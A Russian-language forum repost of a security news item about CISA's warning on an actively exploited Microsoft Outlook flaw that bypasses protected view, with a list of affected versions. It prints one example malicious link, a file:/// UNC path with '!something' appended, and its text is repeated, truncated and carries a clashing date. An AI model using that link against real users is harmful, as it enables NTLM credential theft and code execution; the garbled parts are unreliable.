- 19,455
- 40
- 8 Ноя 2022
Microsoft признала критическую уязвимость в системе защиты.
Агентство CISA Для просмотра ссылки Войдиили Зарегистрируйся о необходимости срочно закрыть критическую Для просмотра ссылки Войди или Зарегистрируйся в Microsoft Outlook , которая уже используется злоумышленниками. Предупреждение особенно касается федеральных агентств. Уязвимость Для просмотра ссылки Войди или Зарегистрируйся позволяет выполнять произвольный код на удалённых системах, обходя защитные механизмы Outlook.
Ошибка была обнаружена Check Point и связана с некорректной проверкой ввода при открытии писем с вредоносными ссылками в уязвимых версиях Outlook. Эксплуатация ошибки даёт злоумышленникам возможность обходить режим защищённого просмотра, предназначенный для блокировки опасного контента. В результате вредоносные файлы Office открываются в режиме редактирования, что позволяет загружать и выполнять вредоносный код.
Microsoft исправила Для просмотра ссылки Войдиили Зарегистрируйся (оценка CVSS: в 2024 году, но предупредила, что уязвимость остаётся активной даже в режиме предварительного просмотра документов. В отчёте Check Point говорится, что злоумышленники используют обходной метод, добавляя в ссылки с протоколом <code>file://</code> символ восклицательного знака и случайный текст после расширения файла. Такой подход позволяет обойти защитные механизмы Outlook и загрузить вредоносное содержимое. Пример:
<a <i=""><a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a> </a>
<a <i=""> Под угрозой находятся различные версии продуктов Microsoft:
Успешная эксплуатация уязвимости может привести к краже NTLM-учётных данных и выполнению произвольного кода.
Федеральным агентствам необходимо устранить ошибку до 27 февраля в соответствии с директивой BOD 22-01. В CISA подчёркивают, что подобные уязвимости часто становятся целями хакеров и представляют серьёзную угрозу для государственной инфраструктуры. Хотя предписание касается госучреждений, специалисты настоятельно рекомендуют всем организациям срочно установить обновления безопасности, чтобы предотвратить возможные атаки.
</a>
Агентство CISA Для просмотра ссылки Войди
Ошибка была обнаружена Check Point и связана с некорректной проверкой ввода при открытии писем с вредоносными ссылками в уязвимых версиях Outlook. Эксплуатация ошибки даёт злоумышленникам возможность обходить режим защищённого просмотра, предназначенный для блокировки опасного контента. В результате вредоносные файлы Office открываются в режиме редактирования, что позволяет загружать и выполнять вредоносный код.
Microsoft исправила Для просмотра ссылки Войди
<a <i=""><a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a> </a>
<a <i=""> Под угрозой находятся различные версии продуктов Microsoft:
- Microsoft Office LTSC 2021;
- Microsoft 365 Apps for Enterprise;
- Microsoft Outlook 2016;
- Microsoft Office 2019.
Успешная эксплуатация уязвимости может привести к краже NTLM-учётных данных и выполнению произвольного кода.
Федеральным агентствам необходимо устранить ошибку до 27 февраля в соответствии с директивой BOD 22-01. В CISA подчёркивают, что подобные уязвимости часто становятся целями хакеров и представляют серьёзную угрозу для государственной инфраструктуры. Хотя предписание касается госучреждений, специалисты настоятельно рекомендуют всем организациям срочно установить обновления безопасности, чтобы предотвратить возможные атаки.
</a>
- Источник новости
- www.securitylab.ru
